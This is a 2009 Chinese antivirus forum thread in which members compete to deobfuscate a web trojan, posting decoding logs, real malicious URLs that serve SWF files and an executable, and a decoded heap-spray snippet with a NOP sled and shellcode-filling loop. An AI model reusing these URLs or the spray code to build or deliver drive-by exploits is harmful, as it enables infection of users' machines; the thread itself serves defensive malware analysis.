瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第三十三期(已结束)

123   1  /  3  页   跳转

[悬赏] 网马解密悬赏第三十三期(已结束)

收藏
本主题由 版主 networkedition 于 2009-9-27 9:14:57 执行 关闭主题/取消 操作
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-09-25 11:05 | 只看楼主 短消息 资料
字号: 1楼

网马解密悬赏第三十三期(已结束)



引用:
http://temphk5.myz.info/9net/content.html




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        [url=http://www.cha88.cn/
http://www.cha88.cn/[/quote[/url]]
   

引用:
注:卡卡反病毒小组和版主等不允许参加,网址如失效,使用附件内容进行解密


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

附件附件:

文件名:content.rar
下载次数:477
文件类型:application/octet-stream
文件大小:
上传时间:2009-9-25 11:07:40
描述:rar

最后编辑networkedition 最后编辑于 2009-09-27 09:15:28
分享到:
gototop
 
damiwho
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2009-09-25
  • 来自:
发表于: 2009-09-25 15:51 | 短消息 资料
字号: 2楼

回复:网马解密悬赏第三十三期

http://219.90.115.239/9net/f/faint.jpg 最后的一个结果

恶意链接地址禁用url
最后编辑networkedition 最后编辑于 2009-09-25 15:52:59
gototop
 
damiwho
头像
初生襁褓狮
  • 帖子:2
  • 注册: 2009-09-25
  • 来自:
发表于: 2009-09-25 15:52 | 短消息 资料
字号: 3楼

回复:网马解密悬赏第三十三期

<textarea>http://219.90.115.239/9net/f/faint.jpg</textarea>
gototop
 
king1636
头像
禁止访问
  • 帖子:385
  • 注册: 2009-08-13
  • 来自:
发表于: 2009-09-25 16:07 | 短消息 资料
字号: 4楼

回复:网马解密悬赏第三十三期

该用户帖子内容已被屏蔽

gototop
 
天涯浪子1988
头像
初生襁褓狮
  • 帖子:33
  • 注册: 2009-07-31
  • 来自:
发表于: 2009-09-25 18:21 | 短消息 资料
字号: 5楼

回复:网马解密悬赏第三十三期

关于:hxxp://temphk5.myz.info/9net/content.html解密的日志(全体输出 -  4):

Level  0>http://temphk5.myz.info/9net/content.html
Level  1>http://temphk5.myz.info/9net/ff23-ie7-xp.swf
Level  1>http://temphk5.myz.info/9net/done.swf(无法下载)
Level  1>http://219.90.115.239/9net/f/faint.jpg

日志由 Redoce2.0第45次修正版于 2009/9/25 18:09:23 生成。

另外提醒下版主你给的那个在线解密网址似乎已经过期了 现在用这个http://issmall.isgreat.org/
最后编辑天涯浪子1988 最后编辑于 2009-09-25 18:32:17
gototop
 
kankanhai
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2009-09-24
  • 来自:
发表于: 2009-09-25 18:23 | 短消息 资料
字号: 6楼

回复:网马解密悬赏第三十三期

Log is generated by FreShow.
[wide]http://temphk5.myz.info/9net/content.html
    [object]http://mstsc2005.com/qq.exe
gototop
 
redbsd
头像
拙长孩提狮
  • 帖子:137
  • 注册: 2009-08-20
  • 来自:
发表于: 2009-09-25 18:25 | 短消息 资料
字号: 7楼

回复:网马解密悬赏第三十三期

唉,试了几种方法都找不到链接;
我说下我的方法吧:
1.代码里有个eval ,把它改成alert,弹出一个框,内容如下:
---------------------------
Microsoft Internet Explorer
---------------------------
var nop = unescape("%u9090%u9090");
var ptr1 = unescape("%u0e00%u0e00");
var ptr2 = unescape("%u0f80%u0f80");

var array = new Array();

SCSC = unescape(SCSC.replace(/%uzv/g, "%u"));
var fill1 = makevtable(ptr1, ptr2, nop, SCSC);

for (i = 0; i < 220; i++)
{
array = fill1 + 'a';
}
---------------------------
确定 
---------------------------

然后把“%uzv”替换成%u,然后两次ESC后也不能将其解出,当然不替换直接解这个SHELLCODE也不行;

2.还有那些十进制的数也看了一下,应该没有问题;

3.这段代码也没有发现其他的解马关键字;
期盼着请高手解答。
gototop
 
天涯浪子1988
头像
初生襁褓狮
  • 帖子:33
  • 注册: 2009-07-31
  • 来自:
发表于: 2009-09-25 18:29 | 短消息 资料
字号: 8楼

回复: 网马解密悬赏第三十三期



引用:
原帖由 redbsd 于 2009-9-25 18:25:00 发表
唉,试了几种方法都找不到链接;
我说下我的方法吧:
1.代码里有个eval ,把它改成alert,弹出一个框,内容如下:
---------------------------
Microsoft Internet Explorer
---------------------------
var nop = unescape("%u9090%u9090");
va

第二次esc前输入0xC密钥  十进制解出来是告诉我们上面的shellcode用“%uzv”替换成%u,
最后编辑天涯浪子1988 最后编辑于 2009-09-25 18:30:17
gototop
 
redbsd
头像
拙长孩提狮
  • 帖子:137
  • 注册: 2009-08-20
  • 来自:
发表于: 2009-09-25 18:30 | 短消息 资料
字号: 9楼

回复:网马解密悬赏第三十三期

高手们解下版主发的这个文件里的代码吧,“content.rar”
gototop
 
zjmuye
头像
初生襁褓狮
  • 帖子:18
  • 注册: 2007-09-17
  • 来自:
发表于: 2009-09-25 20:20 | 短消息 资料
字号: 10楼

回复: 网马解密悬赏第三十三期

回错帖子了

附件附件:

文件名:未命名.jpg
下载次数:715
文件类型:image/pjpeg
文件大小:
上传时间:2009-9-25 20:19:58
描述:jpg



最后编辑zjmuye 最后编辑于 2009-09-25 20:28:11
gototop
 
<<上一主题|下一主题>>
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT